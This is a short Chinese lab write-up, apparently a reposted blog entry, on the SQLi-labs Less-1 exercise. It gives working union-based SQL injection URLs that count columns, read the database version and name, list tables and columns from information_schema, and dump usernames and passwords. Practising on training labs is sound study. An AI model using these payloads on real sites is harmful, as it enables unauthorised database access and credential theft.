1、訪問sqllab 的less-1 按提示加入http://10.9.2.81/Less-1/?id=1
2、 后面加入單引號,發生報錯http://10.9.2.81/Less-1/?id=1‘
3、 測驗使用查詢顯示資料行數 http://10.9.2.81/Less-1/?id=1‘ order by 1--+ 數字從1到4 ,到4 時候報錯,可以顯示資料只有兩行,
4、 查詢資料庫版本 資料庫名 http://10.9.2.81/Less-1/?id=-1' union select 1,version(),database()--+
5、查詢庫里所有表http://10.9.2.81/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
6、 查詢表里的欄位名http://10.9.2.81/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+
7、 查詢表里用戶名及密碼 http://10.9.2.81/Less-1/?id=-1'union select 2,3,group_concat(username,':',password) from security.users --+
8 結束,通過搜索得到最終結果,但資料庫查詢陳述句僅限于了解而已,不能靈活應用,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/47373.html
標籤:其他
下一篇:關于射頻卡的選取和使用問題